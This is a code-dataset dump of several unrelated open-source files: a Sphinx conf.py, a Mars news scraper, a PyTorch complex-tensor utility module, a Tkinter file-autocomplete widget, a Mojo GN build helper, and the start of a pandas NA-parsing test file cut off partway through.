"MIT"
] | null | null | null |
docs/conf.py
|
deprecated/nebulio
|
8548d9f44117206e9314d676576b24c1bc5e1c76
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# nebulio documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 4 12:54:36 2014.
from __future__ import print_function
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Not yet 06 Aug 2014
# from astropy.sphinx.conf import *
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nebulio'
copyright = u'2014, Author'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
import pkg_resources
try:
release = pkg_resources.get_distribution('nebulio').version
except pkg_resources.DistributionNotFound:
print ('To build the documentation, The distribution information of sandman')
print ('Has to be available. Either install the package into your' )
print ('development environment or run "setup.py develop" to setup the' )
print ('metadata. A virtualenv is recommended!' )
sys.exit(1)
del pkg_resources
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = ["_themes"]
html_theme = 'bootstrap-astrowill'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'nebuliodoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'nebulio.tex', u'nebulio Documentation',
u'Author', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'nebulio', u'nebulio Documentation',
[u'Author'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'nebulio', u'nebulio Documentation',
u'Author', 'nebulio', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'nebulio'
epub_author = u'Author'
epub_publisher = u'Author'
epub_copyright = u'2014, Author'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
| 31.84
| 82
| 0.712207
|
6a64b6e43de0cc5c8260731e12577726d42db5c1
| 3,396
|
py
|
Python
|
Mission-to-Mars/scrape_mars.py
|
tamerfa/Mission-to-Mars
|
116e8dd63c9f3f2803eec723f50f57909216c7e6
|
[
"ADSL"
] | null | null | null |
Mission-to-Mars/scrape_mars.py
|
tamerfa/Mission-to-Mars
|
116e8dd63c9f3f2803eec723f50f57909216c7e6
|
[
"ADSL"
] | null | null | null |
Mission-to-Mars/scrape_mars.py
|
tamerfa/Mission-to-Mars
|
116e8dd63c9f3f2803eec723f50f57909216c7e6
|
[
"ADSL"
] | null | null | null |
# Importing dependencies
from splinter import Browser
from bs4 import BeautifulSoup as bs
from webdriver_manager.chrome import ChromeDriverManager
import time
import pandas as pd
def scrape():
# Initiate browser
executable_path = {'executable_path':ChromeDriverManager().install()}
browser = Browser('chrome',**executable_path, headless=False)
# Defining a dictionary to collect all scraped data
mars_dict = {}
# Scraping 'Nasa Mars News' site
nasa_url = 'https://redplanetscience.com/'
browser.visit(nasa_url)
html = browser.html
soup = bs(html, 'html.parser')
news_title = soup.find('div', class_= 'content_title').text
news_p = soup.find('div', class_= 'article_teaser_body').text
# Adding 'Nasa Mars News' data to mars_dict
mars_dict['news_title'] = news_title
mars_dict['news_p'] = news_p
# Scraping 'JPL Mars Space Images' featured image
jpl_url = 'https://spaceimages-mars.com/'
browser.visit(jpl_url)
html = browser.html
soup = bs(html, 'html.parser')
featured_image = soup.find('img', class_= 'headerimage')
relative_image_url = featured_image['src']
featured_image_url = jpl_url+relative_image_url
# Adding JPL's 'featured_image_url' data to mars_dict
mars_dict['featured_image_url'] = featured_image_url
# Scraping 'Mars Facts' using pandas
facts_url = 'https://galaxyfacts-mars.com/'
tables_list = pd.read_html(facts_url)
# Required table is the first table in the list
table_df = tables_list[0]
table_df.columns = ['Description', 'Mars', 'Earth']
table_df.set_index('Description', inplace=True)
# Save the table to an html file
html_table = table_df.to_html()
html_table = html_table.replace('\n','')
html_table = html_table.replace('class="dataframe', 'class="table table-striped table-bordered')
html_table = html_table.replace('style="text-align: right;"', 'style="text-align: center;"')
# Adding 'Mars Facts' table to mars_dict
mars_dict['facts'] = html_table
# Scraping 'Mars Hemispheres'
hem_url = 'https://marshemispheres.com/'
browser.visit(hem_url)
html = browser.html
soup = bs(html, 'html.parser')
# Getting a list for the links to be clicked
clickables = soup.find_all('a', class_='itemLink product-item')
# clickables contain duplicate links, keep only the ones that contain text
links = []
for link in clickables:
if link.text:
links.append(link)
# Delete unneeded last element of links
links.pop()
# Defining a list to collect data
hemisphere_image_urls = []
for link in links:
hem_dict = {}
link_text = link.find('h3').text
hem_dict['title'] = link_text
#Click to visit the image page
browser.links.find_by_partial_text(link_text).click()
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
img_section = soup.find('div', class_='downloads')
hem_dict['img_url'] = hem_url + img_section.find('a', text='Sample')['href']
hemisphere_image_urls.append(hem_dict)
# Going back to the previous page
browser.back()
time.sleep(1)
browser.quit()
# Adding 'Mars hemishperes' data to mars_dict
mars_dict['hemishperes'] = hemisphere_image_urls
return mars_dict
| 30.594595
| 100
| 0.673145
|
8c4ab07559fc72991a94c3b51d05f7cd777e9186
| 5,799
|
py
|
Python
|
piqa/utils/complex.py
|
charltongroves/piqa
|
63817eeda165563efe5adfc789295ec7908c0201
|
[
"MIT"
] | null | null | null |
piqa/utils/complex.py
|
charltongroves/piqa
|
63817eeda165563efe5adfc789295ec7908c0201
|
[
"MIT"
] | null | null | null |
piqa/utils/complex.py
|
charltongroves/piqa
|
63817eeda165563efe5adfc789295ec7908c0201
|
[
"MIT"
] | null | null | null |
r"""Differentiable and JITable complex tensor API
"""
import torch
def complex(real: torch.Tensor, imag: torch.Tensor) -> torch.Tensor:
r"""Returns a complex tensor with its real part equal to \(\Re\) and
its imaginary part equal to \(\Im\).
$$ c = \Re + i \Im $$
Args:
real: A tensor \(\Re\), \((*,)\).
imag: A tensor \(\Im\), \((*,)\).
Returns:
The complex tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([2., 0.7071])
>>> y = torch.tensor([0., 0.7071])
>>> complex(x, y)
tensor([[2.0000, 0.0000],
[0.7071, 0.7071]])
"""
return torch.stack([real, imag], dim=-1)
def real(x: torch.Tensor) -> torch.Tensor:
r"""Returns the real part of \(x\).
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The real tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> real(x)
tensor([2.0000, 0.7071])
"""
return x[..., 0]
def imag(x: torch.Tensor) -> torch.Tensor:
r"""Returns the imaginary part of \(x\).
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The imaginary tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> imag(x)
tensor([0.0000, 0.7071])
"""
return x[..., 1]
def conj(x: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise conjugate of \(x\).
$$ \bar{x} = \Re(x) - i \Im(x) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The conjugate tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> conj(x)
tensor([[ 2.0000, -0.0000],
[ 0.7071, -0.7071]])
"""
return x * torch.tensor([1., -1.]).to(x)
def turn(x: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise product of \(x\) with \(i\).
$$ i x = -\Im(x) + i \Re(x) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The turned tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> turn(x)
tensor([[-0.0000, 2.0000],
[-0.7071, 0.7071]])
"""
return complex(-imag(x), real(x))
def polar(r: torch.Tensor, phi: torch.Tensor) -> torch.Tensor:
r"""Returns a complex tensor with its modulus equal to \(r\)
and its phase equal to \(\phi\).
$$ c = r \exp(i \phi) $$
Args:
r: A tensor \(r\), \((*,)\).
phi: A tensor \(\phi\), \((*,)\).
Returns:
The complex tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([2., 1.])
>>> y = torch.tensor([0., 0.7854])
>>> polar(x, y)
tensor([[2.0000, 0.0000],
[0.7071, 0.7071]])
"""
return complex(r * torch.cos(phi), r * torch.sin(phi))
def mod(x: torch.Tensor, squared: bool = False) -> torch.Tensor:
r"""Returns the modulus (absolute value) of \(x\).
$$ \left| x \right| = \sqrt{ \Re(x)^2 + \Im(x)^2 } $$
Args:
x: A complex tensor, \((*, 2)\).
squared: Whether the output is squared or not.
Returns:
The modulus tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> mod(x)
tensor([2.0000, 1.0000])
"""
x = x.square().sum(dim=-1)
if not squared:
x = torch.sqrt(x)
return x
def angle(x: torch.Tensor) -> torch.Tensor:
r"""Returns the angle (phase) of \(x\).
$$ \phi(x) = \operatorname{atan2}(\Im(x), \Re(x)) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The angle tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> angle(x)
tensor([0.0000, 0.7854])
"""
return torch.atan2(x[..., 1], x[..., 0])
def prod(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise product of \(x\) and \(y\).
$$ x y = \Re(x) \Re(y) - \Im(x) \Im(y)
+ i \left( \Re(x) \Im(y) - \Im(x) \Re(y) \right) $$
Args:
x: A complex tensor, \((*, 2)\).
y: A complex tensor, \((*, 2)\).
Returns:
The product tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> y = torch.tensor([[2., -0.], [0.7071, -0.7071]])
>>> prod(x, y)
tensor([[4.0000, 0.0000],
[1.0000, 0.0000]])
"""
x_r, x_i = x[..., 0], x[..., 1]
y_r, y_i = y[..., 0], y[..., 1]
return complex(x_r * y_r - x_i * y_i, x_i * y_r + x_r * y_i)
def dot(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise dot-product of \(x\) and \(y\).
$$ x \odot y = \Re(x) \Re(y) + \Im(x) \Im(y) $$
Args:
x: A complex tensor, \((*, 2)\).
y: A complex tensor, \((*, 2)\).
Returns:
The dot-product tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> y = torch.tensor([[2., -0.], [0.7071, -0.7071]])
>>> dot(x, y)
tensor([4., 0.])
"""
return (x * y).sum(dim=-1)
def pow(x: torch.Tensor, exponent: float) -> torch.Tensor:
r"""Returns the power of \(x\) with `exponent`.
$$ x^p = \left| x \right|^p \exp(i \phi(x))^p $$
Args:
x: A complex tensor, \((*, 2)\).
exponent: The exponent \(p\).
Returns:
The power tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> pow(x, 2.)
tensor([[ 4.0000e+00, 0.0000e+00],
[-4.3711e-08, 9.9998e-01]])
"""
r = mod(x, squared=True) ** (exponent / 2)
phi = angle(x) * exponent
return polar(r, phi)
| 23.103586
| 72
| 0.459907
|
82e5834fde2f8a5a129e78d0aef493adfdd8b1ee
| 12,116
|
py
|
Python
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
tdiprima/code
|
61a74f5f93da087d27c70b2efe779ac6bd2a3b4f
|
[
"MIT"
] | 2,023
|
2017-07-29T09:34:46.000Z
|
2022-03-24T08:00:45.000Z
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 32
|
2017-09-02T17:20:08.000Z
|
2022-02-11T17:49:37.000Z
|
recipes/Python/580771_Tkinter_file_autocomplete_entry/recipe-580771.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 780
|
2017-07-28T19:23:28.000Z
|
2022-03-25T20:39:41.000Z
|
# Author: Miguel Martinez Lopez
# Version: 0.6
import re
import os
try:
from Tkinter import StringVar, Entry, Frame, Listbox, Button, Scrollbar
from Tkconstants import *
except ImportError:
from tkinter import StringVar, Entry, Frame, Listbox, Button, Scrollbar
from tkinter.constants import *
try:
from tkFileDialog import *
except ImportError:
from tkinter.filedialog import *
def autoscroll(sbar, first, last):
"""Hide and show scrollbar as needed."""
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
class Combobox_Autocomplete(Entry, object):
def __init__(self, master, list_of_items=None, autocomplete_function=None, listbox_width=None, listbox_height=7, ignorecase_match=False, startswith_match=True, vscrollbar=True, hscrollbar=True, **kwargs):
if hasattr(self, "autocomplete_function"):
if autocomplete_function is not None:
raise ValueError("Combobox_Autocomplete subclass has 'autocomplete_function' implemented")
else:
if autocomplete_function is not None:
self.autocomplete_function = autocomplete_function
else:
if list_of_items is None:
raise ValueError("If not guiven complete function, list_of_items can't be 'None'")
if ignorecase_match:
if startswith_match:
def matches_function(entry_data, item):
return item.startswith(entry_data)
else:
def matches_function(entry_data, item):
return item in entry_data
self.autocomplete_function = lambda entry_data: [item for item in self.list_of_items if matches_function(entry_data, item)]
else:
if startswith_match:
def matches_function(escaped_entry_data, item):
if re.match(escaped_entry_data, item, re.IGNORECASE):
return True
else:
return False
else:
def matches_function(escaped_entry_data, item):
if re.search(escaped_entry_data, item, re.IGNORECASE):
return True
else:
return False
def autocomplete_function(entry_data):
escaped_entry_data = re.escape(entry_data)
return [item for item in self.list_of_items if matches_function(escaped_entry_data, item)]
self.autocomplete_function = autocomplete_function
self._listbox_height = int(listbox_height)
self._listbox_width = listbox_width
self.list_of_items = list_of_items
self._use_vscrollbar = vscrollbar
self._use_hscrollbar = hscrollbar
kwargs.setdefault("background", "white")
if "textvariable" in kwargs:
self._entry_var = kwargs["textvariable"]
else:
self._entry_var = kwargs["textvariable"] = StringVar()
Entry.__init__(self, master, **kwargs)
self._trace_id = self._entry_var.trace('w', self._on_change_entry_var)
self._listbox = None
self.bind("<Tab>", self._on_tab)
self.bind("<Up>", self._previous)
self.bind("<Down>", self._next)
self.bind('<Control-n>', self._next)
self.bind('<Control-p>', self._previous)
self.bind("<Return>", self._update_entry_from_listbox)
self.bind("<Escape>", lambda event: self.unpost_listbox())
def _on_tab(self, event):
self.post_listbox()
return "break"
def _on_change_entry_var(self, name, index, mode):
entry_data = self._entry_var.get()
if entry_data == '':
self.unpost_listbox()
self.focus()
else:
values = self.autocomplete_function(entry_data)
if values:
if self._listbox is None:
self._build_listbox(values)
else:
self._listbox.delete(0, END)
height = min(self._listbox_height, len(values))
self._listbox.configure(height=height)
for item in values:
self._listbox.insert(END, item)
else:
self.unpost_listbox()
self.focus()
def _build_listbox(self, values):
listbox_frame = Frame()
self._listbox = Listbox(listbox_frame, background="white", selectmode=SINGLE, activestyle="none", exportselection=False)
self._listbox.grid(row=0, column=0,sticky = N+E+W+S)
self._listbox.bind("<ButtonRelease-1>", self._update_entry_from_listbox)
self._listbox.bind("<Return>", self._update_entry_from_listbox)
self._listbox.bind("<Escape>", lambda event: self.unpost_listbox())
self._listbox.bind('<Control-n>', self._next)
self._listbox.bind('<Control-p>', self._previous)
if self._use_vscrollbar:
vbar = Scrollbar(listbox_frame, orient=VERTICAL, command= self._listbox.yview)
vbar.grid(row=0, column=1, sticky=N+S)
self._listbox.configure(yscrollcommand= lambda f, l: autoscroll(vbar, f, l))
if self._use_hscrollbar:
hbar = Scrollbar(listbox_frame, orient=HORIZONTAL, command= self._listbox.xview)
hbar.grid(row=1, column=0, sticky=E+W)
self._listbox.configure(xscrollcommand= lambda f, l: autoscroll(hbar, f, l))
listbox_frame.grid_columnconfigure(0, weight= 1)
listbox_frame.grid_rowconfigure(0, weight= 1)
x = -self.cget("borderwidth") - self.cget("highlightthickness")
y = self.winfo_height()-self.cget("borderwidth") - self.cget("highlightthickness")
if self._listbox_width:
width = self._listbox_width
else:
width=self.winfo_width()
listbox_frame.place(in_=self, x=x, y=y, width=width)
height = min(self._listbox_height, len(values))
self._listbox.configure(height=height)
for item in values:
self._listbox.insert(END, item)
def post_listbox(self):
if self._listbox is not None: return
entry_data = self._entry_var.get()
if entry_data == '': return
values = self.autocomplete_function(entry_data)
if values:
self._build_listbox(values)
def unpost_listbox(self):
if self._listbox is not None:
self._listbox.master.destroy()
self._listbox = None
def get_value(self):
return self._entry_var.get()
def set_value(self, text, close_dialog=False):
self._set_var(text)
if close_dialog:
self.unpost_listbox()
self.icursor(END)
self.xview_moveto(1.0)
def _set_var(self, text):
self._entry_var.trace_vdelete("w", self._trace_id)
self._entry_var.set(text)
self._trace_id = self._entry_var.trace('w', self._on_change_entry_var)
def _update_entry_from_listbox(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if current_selection:
text = self._listbox.get(current_selection)
self._set_var(text)
self._listbox.master.destroy()
self._listbox = None
self.focus()
self.icursor(END)
self.xview_moveto(1.0)
return "break"
def _previous(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if len(current_selection)==0:
self._listbox.selection_set(0)
self._listbox.activate(0)
else:
index = int(current_selection[0])
self._listbox.selection_clear(index)
if index == 0:
index = END
else:
index -= 1
self._listbox.see(index)
self._listbox.selection_set(first=index)
self._listbox.activate(index)
return "break"
def _next(self, event):
if self._listbox is not None:
current_selection = self._listbox.curselection()
if len(current_selection)==0:
self._listbox.selection_set(0)
self._listbox.activate(0)
else:
index = int(current_selection[0])
self._listbox.selection_clear(index)
if index == self._listbox.size() - 1:
index = 0
else:
index +=1
self._listbox.see(index)
self._listbox.selection_set(index)
self._listbox.activate(index)
return "break"
class File_Entry(Frame, object):
def __init__(self, master, ask_dialog = askopenfilename, width=30, **dialog_options):
Frame.__init__(self, master)
self._file_autocomplete = Combobox_Autocomplete(self, width=width, autocomplete_function=self._autocomplete_function)
self._file_autocomplete.pack(side=LEFT)
button_size = self._file_autocomplete.winfo_reqheight()
button_frame = Frame(self, height=button_size, width=button_size)
button_frame.pack(side=LEFT, padx=(3,0))
button_frame.pack_propagate(0)
Button(button_frame, text="...", command=self._open_dialog).pack(fill=BOTH, expand=True)
self._ask_dialog = ask_dialog
self._dialog_options = dialog_options
@property
def path(self):
return self._file_autocomplete.get_value()
def focus(self):
self._file_autocomplete.focus()
def _open_dialog(self):
filename = self._ask_dialog(**self._dialog_options)
self._file_autocomplete.set_value(filename, close_dialog=True)
def _autocomplete_function(self, base_path):
try:
base_path = os.path.normcase(base_path)
if base_path.endswith(os.path.sep) and os.path.isdir(base_path):
list_of_paths = []
for filename in os.listdir(base_path):
file_path = os.path.join(base_path, filename)
if os.path.isdir(file_path):
file_path += os.sep
list_of_paths.append(file_path)
list_of_paths.sort()
return list_of_paths
else:
current_directory, prefix = os.path.split(base_path)
if not os.path.isdir(current_directory): return None
list_of_paths = []
for filename in os.listdir(current_directory):
filename = os.path.normcase(filename)
if filename.startswith(prefix):
file_path = os.path.join(current_directory, filename)
if os.path.isdir(file_path):
file_path += os.sep
list_of_paths.append(file_path)
list_of_paths.sort()
return list_of_paths
except os.error:
return None
if __name__ == '__main__':
try:
from Tkinter import Tk
except ImportError:
from tkinter import Tk
root = Tk()
root.geometry("300x200")
file_entry = File_Entry(root)
file_entry.pack()
file_entry.focus()
root.mainloop()
| 35.017341
| 208
| 0.569742
|
aeaa135059270c550573096800162fd64d09fe62
| 3,982
|
py
|
Python
|
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | 5
|
2015-04-30T00:13:21.000Z
|
2019-07-10T02:17:24.000Z
|
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | null | null | null |
mojo/tools/mopy/gn.py
|
rafaelw/mojo
|
d3495a129dcbe679e2d5ac729c85a58acf38f8c4
|
[
"BSD-3-Clause"
] | 1
|
2019-05-12T13:53:44.000Z
|
2019-05-12T13:53:44.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
GN-related configuration functions, e.g., to produce a Config object from a GN
args.gn file).
"""
import ast
import os.path
import re
from .config import Config
def BuildDirectoryForConfig(config, src_root):
"""
Returns the build directory for the given configuration.
"""
subdir = ""
if config.target_os == Config.OS_ANDROID:
subdir += "android_"
if config.target_arch != Config.ARCH_ARM:
subdir += config.target_arch + "_"
elif config.target_os == Config.OS_CHROMEOS:
subdir += "chromeos_"
subdir += "Debug" if config.is_debug else "Release"
if config.sanitizer == Config.SANITIZER_ASAN:
subdir += "_asan"
if not(config.is_debug) and config.dcheck_always_on:
subdir += "_dcheck"
return os.path.join(src_root, "out", subdir)
def GNArgsForConfig(config):
"""
Return the arguments for gn for the given configuration. This function returns
a dictionary with boolean values as boolean.
"""
gn_args = {}
gn_args["is_debug"] = bool(config.is_debug)
gn_args["is_asan"] = config.sanitizer == Config.SANITIZER_ASAN
if config.is_clang is not None:
gn_args["is_clang"] = bool(config.is_clang)
else:
gn_args["is_clang"] = config.target_os not in (Config.OS_ANDROID,
Config.OS_WINDOWS)
if config.values.get("use_goma"):
gn_args["use_goma"] = True
gn_args["goma_dir"] = config.values["goma_dir"]
else:
gn_args["use_goma"] = False
gn_args["dcheck_always_on"] = config.dcheck_always_on
gn_args["mojo_use_nacl"] = config.values.get("use_nacl", False)
if config.target_os == Config.OS_ANDROID:
gn_args["os"] = "android"
elif config.target_os == Config.OS_CHROMEOS:
gn_args["os"] = "chromeos"
gn_args["use_glib"] = False
gn_args["use_system_harfbuzz"] = False
elif config.target_os == Config.OS_LINUX:
gn_args["is_desktop_linux"] = False
gn_args["use_aura"] = False
gn_args["use_glib"] = False
gn_args["use_system_harfbuzz"] = False
gn_args["target_arch"] = config.target_arch
return gn_args
def CommandLineForGNArgs(gn_args):
"""
Returns the list of gn arguments to use with the gn command line.
"""
def _ToCommandLine(key, value):
if type(value) is bool:
return "%s=%s" % (key, "true" if value else "false")
return "%s=\"%s\"" % (key, value)
return [_ToCommandLine(x, y) for x, y in gn_args.iteritems()]
def ConfigForGNArgs(args):
"""
Return the Config object for the given gn arguments. This function takes a
dictionary with boolean values as boolean.
"""
config_args = {}
config_args["is_debug"] = args.get("is_debug", False)
config_args["sanitizer"] = (
Config.SANITIZER_ASAN if args.get("is_asan") else None)
config_args["is_clang"] = args.get("is_clang", False)
config_args["use_goma"] = args.get("use_goma", False)
if config_args["use_goma"]:
config_args["goma_dir"] = args.get("goma_dir")
config_args["use_nacl"] = args.get("mojo_use_nacl", False)
config_args["target_os"] = args.get("os")
config_args["target_arch"] = args.get("target_arch")
config_args["dcheck_always_on"] = args.get("dcheck_always_on")
return Config(**config_args)
def ParseGNConfig(build_dir):
"""
Parse the gn config file present in |build_dir|. This function returns a
dictionary with boolean values as boolean.
"""
TRANSLATIONS = {
"true": "True",
"false": "False",
}
gn_file = os.path.join(build_dir, "args.gn")
values = {}
with open(gn_file, "r") as f:
for line in f.readlines():
line = re.sub("\s*#.*", "", line)
result = re.match("^\s*(\w+)\s*=\s*(.*)\s*$", line)
if result:
key = result.group(1)
value = result.group(2)
values[key] = ast.literal_eval(TRANSLATIONS.get(value, value))
return values
| 30.396947
| 80
| 0.672275
|
36a9bb31e79dc2213764822b6aa8753387557b01
| 15,650
|
py
|
Python
|
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/io/parser/test_na_values.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | 1
|
2021-04-26T22:41:56.000Z
|
2021-04-26T22:41:56.000Z
|
"""
Tests that NA values are properly handled during
parsing for all of the parsers defined in parsers.py
"""
from io import StringIO
import numpy as np
import pytest
from pandas._libs.parsers import STR_NA_VALUES
from pandas import DataFrame, Index, MultiIndex
import pandas._testing as tm
def test_string_nas(all_parsers):
parser = all_parsers
data = """A,B,C
a,b,c
d,,f
,g,h
"""
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[["a", "b", "c"], ["d", np.nan, "f"], [np.nan, "g", "h"]],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(result, expected)
def test_detect_string_na(all_parsers):
parser = all_parsers
data = """A,B
foo,bar
